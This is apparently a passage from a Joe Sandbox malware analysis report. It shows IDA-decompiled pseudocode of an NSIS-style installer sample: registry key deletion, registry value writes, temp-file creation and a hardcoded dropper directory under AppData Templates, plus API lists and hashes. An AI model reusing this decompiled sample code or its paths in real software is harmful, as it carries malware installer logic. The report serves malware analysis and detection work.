                                                                                                                        								RegCloseKey(_v8);
                                                                                                                        								return 0x3eb;
                                                                                                                        							}
                                                                                                                        							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                                                                                        							__eflags = _t33;
                                                                                                                        							if(_t33 != 0) {
                                                                                                                        								break;
                                                                                                                        							}
                                                                                                                        							_push(0x105);
                                                                                                                        							_push( &_v536);
                                                                                                                        							_push(_t45);
                                                                                                                        						}
                                                                                                                        						RegCloseKey(_v8);
                                                                                                                        						_t35 = E0040690A(3);
                                                                                                                        						if(_t35 != 0) {
                                                                                                                        							return  *_t35(_a4, _a8, _t47, 0);
                                                                                                                        						}
                                                                                                                        						return RegDeleteKeyW(_a4, _a8);
                                                                                                                        					}
                                                                                                                        					_v12 = 0;
                                                                                                                        					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                                                                                        						goto L10;
                                                                                                                        					}
                                                                                                                        					goto L3;
                                                                                                                        				}
                                                                                                                        				return _t27;
                                                                                                                        			}













                                                                                                                        APIs
                                                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEnum$DeleteValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1354259210-0
                                                                                                                        • Opcode ID: dc8cb0d45d0e764757af0bf3ef39bc9c9df94b231d7a40b46c34be9b63524f7d
                                                                                                                        • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                                                                                                        • Opcode Fuzzy Hash: dc8cb0d45d0e764757af0bf3ef39bc9c9df94b231d7a40b46c34be9b63524f7d
                                                                                                                        • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 88%
                                                                                                                        			E70B21817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                        				void _v36;
                                                                                                                        				char _v136;
                                                                                                                        				struct HINSTANCE__* _t37;
                                                                                                                        				void* _t39;
                                                                                                                        				intOrPtr _t42;
                                                                                                                        				void* _t48;
                                                                                                                        				void* _t49;
                                                                                                                        				void* _t50;
                                                                                                                        				void* _t54;
                                                                                                                        				intOrPtr _t57;
                                                                                                                        				signed int _t61;
                                                                                                                        				signed int _t63;
                                                                                                                        				void* _t67;
                                                                                                                        				void* _t68;
                                                                                                                        				void* _t72;
                                                                                                                        				void* _t76;
                                                                                                                        
                                                                                                                        				_t76 = __esi;
                                                                                                                        				_t68 = __edi;
                                                                                                                        				_t67 = __edx;
                                                                                                                        				 *0x70b2506c = _a8;
                                                                                                                        				 *0x70b25070 = _a16;
                                                                                                                        				 *0x70b25074 = _a12;
                                                                                                                        				 *((intOrPtr*)(_a20 + 0xc))( *0x70b25048, E70B21651);
                                                                                                                        				_push(1);
                                                                                                                        				_t37 = E70B21BFF();
                                                                                                                        				_t54 = _t37;
                                                                                                                        				if(_t54 == 0) {
                                                                                                                        					L28:
                                                                                                                        					return _t37;
                                                                                                                        				} else {
                                                                                                                        					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                                                        						E70B2243E(_t54);
                                                                                                                        					}
                                                                                                                        					_push(_t54);
                                                                                                                        					E70B22480(_t67);
                                                                                                                        					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                                                                                        					if(_t57 == 0xffffffff) {
                                                                                                                        						L14:
                                                                                                                        						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
                                                                                                                        							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                                                                                        								_push(_t54);
                                                                                                                        								_t37 = E70B22655();
                                                                                                                        							} else {
                                                                                                                        								_push(_t76);
                                                                                                                        								_push(_t68);
                                                                                                                        								_t61 = 8;
                                                                                                                        								_t13 = _t54 + 0x1018; // 0x1018
                                                                                                                        								memcpy( &_v36, _t13, _t61 << 2);
                                                                                                                        								_t42 = E70B21666(_t54,  &_v136);
                                                                                                                        								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
                                                                                                                        								_t18 = _t54 + 0x1018; // 0x1018
                                                                                                                        								_t72 = _t18;
                                                                                                                        								_push(_t54);
                                                                                                                        								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
                                                                                                                        								 *_t72 = 4;
                                                                                                                        								E70B22655();
                                                                                                                        								_t63 = 8;
                                                                                                                        								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                                                                                        							}
                                                                                                                        						} else {
                                                                                                                        							_push(_t54);
                                                                                                                        							E70B22655();
                                                                                                                        							_t37 = GlobalFree(E70B21312(E70B21654(_t54)));
                                                                                                                        						}
                                                                                                                        						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                                                        							_t37 = E70B22618(_t54);
                                                                                                                        							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                                                                                        								_t37 =  *(_t54 + 0x1008);
                                                                                                                        								if(_t37 != 0) {
                                                                                                                        									_t37 = FreeLibrary(_t37);
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
                                                                                                                        								_t37 = E70B215DD( *0x70b25068);
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
                                                                                                                        							goto L28;
                                                                                                                        						} else {
                                                                                                                        							_t39 = GlobalFree(_t54); // executed
                                                                                                                        							return _t39;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					_t48 =  *_t54;
                                                                                                                        					if(_t48 == 0) {
                                                                                                                        						if(_t57 != 1) {
                                                                                                                        							goto L14;
                                                                                                                        						}
                                                                                                                        						E70B22E23(_t54);
                                                                                                                        						L12:
                                                                                                                        						_t54 = _t48;
                                                                                                                        						L13:
                                                                                                                        						goto L14;
                                                                                                                        					}
                                                                                                                        					_t49 = _t48 - 1;
                                                                                                                        					if(_t49 == 0) {
                                                                                                                        						L8:
                                                                                                                        						_t48 = E70B22B98(_t57, _t54); // executed
                                                                                                                        						goto L12;
                                                                                                                        					}
                                                                                                                        					_t50 = _t49 - 1;
                                                                                                                        					if(_t50 == 0) {
                                                                                                                        						E70B22810(_t54);
                                                                                                                        						goto L13;
                                                                                                                        					}
                                                                                                                        					if(_t50 != 1) {
                                                                                                                        						goto L14;
                                                                                                                        					}
                                                                                                                        					goto L8;
                                                                                                                        				}
                                                                                                                        			}



















                                                                                                                        0x70b21886
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b21886

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 70B21BFF: GlobalFree.KERNEL32(?), ref: 70B21E74
                                                                                                                          • Part of subcall function 70B21BFF: GlobalFree.KERNEL32(?), ref: 70B21E79
                                                                                                                          • Part of subcall function 70B21BFF: GlobalFree.KERNEL32(?), ref: 70B21E7E
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 70B218C5
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 70B2194B
                                                                                                                        • GlobalFree.KERNELBASE(00000000), ref: 70B21970
                                                                                                                          • Part of subcall function 70B2243E: GlobalAlloc.KERNEL32(00000040,?), ref: 70B2246F
                                                                                                                          • Part of subcall function 70B22810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,70B21896,00000000), ref: 70B228E0
                                                                                                                          • Part of subcall function 70B21666: wsprintfW.USER32 ref: 70B21694
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1129932425.0000000070B21000.00000020.00000001.01000000.00000005.sdmp, Offset: 70B20000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1129862277.0000000070B20000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000000.00000002.1129989345.0000000070B24000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000000.00000002.1130059756.0000000070B26000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70b20000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3962662361-3916222277
                                                                                                                        • Opcode ID: 926207219f42a286a9caec3619a74223dfd5b09d1c9bb9ae1d1165ebbe38b406
                                                                                                                        • Instruction ID: 2776247a629d24204cfe6b0055b3f0da43853842aa60beff86222c452952f15c
                                                                                                                        • Opcode Fuzzy Hash: 926207219f42a286a9caec3619a74223dfd5b09d1c9bb9ae1d1165ebbe38b406
                                                                                                                        • Instruction Fuzzy Hash: A441B6B2400241AADB119F20FCC9B9D37ECEF55312F144969F90E9E286EB7497858BA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 59%
                                                                                                                        			E00401C43(intOrPtr __edx) {
                                                                                                                        				int _t29;
                                                                                                                        				long _t30;
                                                                                                                        				signed int _t32;
                                                                                                                        				WCHAR* _t35;
                                                                                                                        				long _t36;
                                                                                                                        				int _t41;
                                                                                                                        				signed int _t42;
                                                                                                                        				int _t46;
                                                                                                                        				int _t56;
                                                                                                                        				intOrPtr _t57;
                                                                                                                        				struct HWND__* _t63;
                                                                                                                        				void* _t64;
                                                                                                                        
                                                                                                                        				_t57 = __edx;
                                                                                                                        				_t29 = E00402D84(3);
                                                                                                                        				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                                                        				 *(_t64 - 0x18) = _t29;
                                                                                                                        				_t30 = E00402D84(4);
                                                                                                                        				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                                                        				 *(_t64 + 8) = _t30;
                                                                                                                        				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                                                                                        					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                                                                                        				}
                                                                                                                        				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                                                                                        				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                                                                                        					 *(_t64 + 8) = E00402DA6(0x44);
                                                                                                                        				}
                                                                                                                        				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                                                                                        				_push(1);
                                                                                                                        				if(__eflags != 0) {
                                                                                                                        					_t61 = E00402DA6();
                                                                                                                        					_t32 = E00402DA6();
                                                                                                                        					asm("sbb ecx, ecx");
                                                                                                                        					asm("sbb eax, eax");
                                                                                                                        					_t35 =  ~( *_t31) & _t61;
                                                                                                                        					__eflags = _t35;
                                                                                                                        					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
                                                                                                                        					goto L10;
                                                                                                                        				} else {
                                                                                                                        					_t63 = E00402D84();
                                                                                                                        					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                                                        					_t41 = E00402D84(2);
                                                                                                                        					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                                                        					_t56 =  *(_t64 - 0x1c) >> 2;
                                                                                                                        					if(__eflags == 0) {
                                                                                                                        						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                                                                                        						L10:
                                                                                                                        						 *(_t64 - 0x38) = _t36;
                                                                                                                        					} else {
                                                                                                                        						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                                                                                        						asm("sbb eax, eax");
                                                                                                                        						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                                                                                        				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                                                                                        					_push( *(_t64 - 0x38));
                                                                                                                        					E00406484();
                                                                                                                        				}
                                                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
                                                                                                                        				return 0;
                                                                                                                        			}


                                                                                                                        APIs
                                                                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Timeout
                                                                                                                        • String ID: !
                                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                                        • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                                                        • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                                                                                                        • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                                                        • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 83%
                                                                                                                        			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
                                                                                                                        				void* _t20;
                                                                                                                        				void* _t21;
                                                                                                                        				int _t24;
                                                                                                                        				long _t25;
                                                                                                                        				int _t30;
                                                                                                                        				intOrPtr _t33;
                                                                                                                        				void* _t34;
                                                                                                                        				intOrPtr _t37;
                                                                                                                        				void* _t39;
                                                                                                                        				void* _t42;
                                                                                                                        
                                                                                                                        				_t42 = __eflags;
                                                                                                                        				_t33 = __edx;
                                                                                                                        				_t30 = __ebx;
                                                                                                                        				_t37 =  *((intOrPtr*)(_t39 - 0x20));
                                                                                                                        				_t34 = __eax;
                                                                                                                        				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
                                                                                                                        				 *(_t39 - 0x44) = E00402DA6(2);
                                                                                                                        				_t20 = E00402DA6(0x11);
                                                                                                                        				 *(_t39 - 4) = 1;
                                                                                                                        				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
                                                                                                                        				 *(_t39 + 8) = _t21;
                                                                                                                        				if(_t21 != __ebx) {
                                                                                                                        					_t24 = 0;
                                                                                                                        					if(_t37 == 1) {
                                                                                                                        						E00402DA6(0x23);
                                                                                                                        						_t24 = lstrlenW(0x40b5f0) + _t29 + 2;
                                                                                                                        					}
                                                                                                                        					if(_t37 == 4) {
                                                                                                                        						 *0x40b5f0 = E00402D84(3);
                                                                                                                        						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
                                                                                                                        						_t24 = _t37;
                                                                                                                        					}
                                                                                                                        					if(_t37 == 3) {
                                                                                                                        						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f0, 0x1800); // executed
                                                                                                                        					}
                                                                                                                        					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f0, _t24); // executed
                                                                                                                        					if(_t25 == 0) {
                                                                                                                        						 *(_t39 - 4) = _t30;
                                                                                                                        					}
                                                                                                                        					_push( *(_t39 + 8));
                                                                                                                        					RegCloseKey();
                                                                                                                        				}
                                                                                                                        				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                                                                                        				return 0;
                                                                                                                        			}














                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp,00000023,00000011,00000002), ref: 004024D5
                                                                                                                        • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp,00000000,00000011,00000002), ref: 00402515
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseValuelstrlen
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp
                                                                                                                        • API String ID: 2655323295-590935851
                                                                                                                        • Opcode ID: e1abf43c66d66a2eab4c5912dddbc3fe95e81c2d10ca9088dde855beb5deaf18
                                                                                                                        • Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
                                                                                                                        • Opcode Fuzzy Hash: e1abf43c66d66a2eab4c5912dddbc3fe95e81c2d10ca9088dde855beb5deaf18
                                                                                                                        • Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                                                        				intOrPtr _v8;
                                                                                                                        				short _v12;
                                                                                                                        				short _t12;
                                                                                                                        				intOrPtr _t13;
                                                                                                                        				signed int _t14;
                                                                                                                        				WCHAR* _t17;
                                                                                                                        				signed int _t19;
                                                                                                                        				signed short _t23;
                                                                                                                        				WCHAR* _t26;
                                                                                                                        
                                                                                                                        				_t26 = _a4;
                                                                                                                        				_t23 = 0x64;
                                                                                                                        				while(1) {
                                                                                                                        					_t12 =  *L"nsa"; // 0x73006e
                                                                                                                        					_t23 = _t23 - 1;
                                                                                                                        					_v12 = _t12;
                                                                                                                        					_t13 =  *0x40a57c; // 0x61
                                                                                                                        					_v8 = _t13;
                                                                                                                        					_t14 = GetTickCount();
                                                                                                                        					_t19 = 0x1a;
                                                                                                                        					_v8 = _v8 + _t14 % _t19;
                                                                                                                        					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                                                                                        					if(_t17 != 0) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					if(_t23 != 0) {
                                                                                                                        						continue;
                                                                                                                        					} else {
                                                                                                                        						 *_t26 =  *_t26 & _t23;
                                                                                                                        					}
                                                                                                                        					L4:
                                                                                                                        					return _t17;
                                                                                                                        				}
                                                                                                                        				_t17 = _t26;
                                                                                                                        				goto L4;
                                                                                                                        			}













                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 0040607A
                                                                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CountFileNameTempTick
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                        • API String ID: 1716503409-944333549
                                                                                                                        • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                        • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                                                                                                                        • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                        • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 86%
                                                                                                                        			E004015C1(short __ebx, void* __eflags) {
                                                                                                                        				void* _t17;
                                                                                                                        				int _t23;
                                                                                                                        				void* _t25;
                                                                                                                        				signed char _t26;
                                                                                                                        				short _t28;
                                                                                                                        				short _t31;
                                                                                                                        				short* _t34;
                                                                                                                        				void* _t36;
                                                                                                                        
                                                                                                                        				_t28 = __ebx;
                                                                                                                        				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                                                                                        				_t17 = E00405EB7(_t16);
                                                                                                                        				_t32 = _t17;
                                                                                                                        				if(_t17 != __ebx) {
                                                                                                                        					do {
                                                                                                                        						_t34 = E00405E39(_t32, 0x5c);
                                                                                                                        						_t31 =  *_t34;
                                                                                                                        						 *_t34 = _t28;
                                                                                                                        						if(_t31 != _t28) {
                                                                                                                        							L5:
                                                                                                                        							_t25 = E00405AEB( *(_t36 + 8));
                                                                                                                        						} else {
                                                                                                                        							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                                                                                        							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
                                                                                                                        								goto L5;
                                                                                                                        							} else {
                                                                                                                        								_t25 = E00405A6E( *(_t36 + 8)); // executed
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						if(_t25 != _t28) {
                                                                                                                        							if(_t25 != 0xb7) {
                                                                                                                        								L9:
                                                                                                                        								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                                                        							} else {
                                                                                                                        								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                                                                                        								if((_t26 & 0x00000010) == 0) {
                                                                                                                        									goto L9;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						 *_t34 = _t31;
                                                                                                                        						_t32 = _t34 + 2;
                                                                                                                        					} while (_t31 != _t28);
                                                                                                                        				}
                                                                                                                        				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                                                                                        					_push(0xfffffff5);
                                                                                                                        					E00401423();
                                                                                                                        				} else {
                                                                                                                        					E00401423(0xffffffe6);
                                                                                                                        					E0040653D(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Folketingsvalget160\\Tatou\\Borgerdyderne\\BLATTARIAE\\Proprietrix\\Natick",  *(_t36 + 8));
                                                                                                                        					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                                                                                        					if(_t23 == 0) {
                                                                                                                        						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
                                                                                                                        				return 0;
                                                                                                                        			}












                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,75AF3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75AF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                                                          • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                                                          • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                          • Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\BLATTARIAE\Proprietrix\Natick,?,00000000,000000F0), ref: 0040164D
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\BLATTARIAE\Proprietrix\Natick, xrefs: 00401640
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                        • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\BLATTARIAE\Proprietrix\Natick
